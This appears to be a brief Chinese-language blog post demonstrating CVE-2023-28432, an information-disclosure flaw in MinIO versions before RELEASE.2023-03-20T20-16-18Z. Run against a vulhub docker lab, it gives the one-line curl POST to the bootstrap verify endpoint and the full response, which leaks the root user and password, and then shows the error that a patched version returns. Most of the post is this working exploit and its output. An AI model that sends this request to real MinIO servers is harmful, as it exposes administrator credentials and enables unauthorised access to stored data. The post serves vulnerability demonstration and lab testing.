MinIO 是一個 object storage 相容 Amazon S3
影響範圍
2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z
這個漏洞會把管理帳密及 secret key 完全、簡單的曝露出來
可以用 /vulhub / CVE-2023-28432 的 docker-compose.yml ,作個 docker POC 出來
只要
curl -X POST http://localhost:9000/minio/bootstrap/v1/verify
結果
{"MinioEndpoints":[{"Legacy":true,"SetCount":1,"DrivesPerSet":3,
"Endpoints":[{"Scheme":"http","Opaque":"","User":null,"Host":"node1:9000",
"Path":"/mnt/data1","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"",
"Fragment":"","RawFragment":"","IsLocal":true},{"Scheme":"http","Opaque":"",
"User":null,"Host":"node2:9000","Path":"/mnt/data2","RawPath":"","OmitHost":false,
"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false},
{"Scheme":"http","Opaque":"","User":null,"Host":"node3:9000","Path":"/mnt/data3",
"RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"",
"RawFragment":"","IsLocal":false}],"CmdLine":"http://node1:9000/mnt/data1 http://node2:9000/mnt/data2 http://node3:9000/mnt/data3",
"Platform":"OS: linux | Arch: amd64"}],"MinioEnv":{"MINIO_ACCESS_KEY_FILE":"access_key","MINIO_CONFIG_ENV_FILE":"config.env",
"MINIO_KMS_SECRET_KEY_FILE":"kms_master_key","MINIO_ROOT_PASSWORD":"minioadmin-vulhub","MINIO_ROOT_PASSWORD_FILE":"secret_key",
"MINIO_ROOT_USER":"minioadmin","MINIO_ROOT_USER_FILE":"access_key","MINIO_SECRET_KEY_FILE":"secret_key"}}
如果 MinIO 有更新,就不會有漏洞了
<ErrorResponse xmlns="https://sts.amazonaws.com/doc/2011-06-15/"><Error><Type></Type> <Code>MissingParameter</Code><Message>Invalid STS API version , expecting 2011-06-15</Message></Error><RequestId>175079BACD831544</RequestId></ErrorResponse>
留言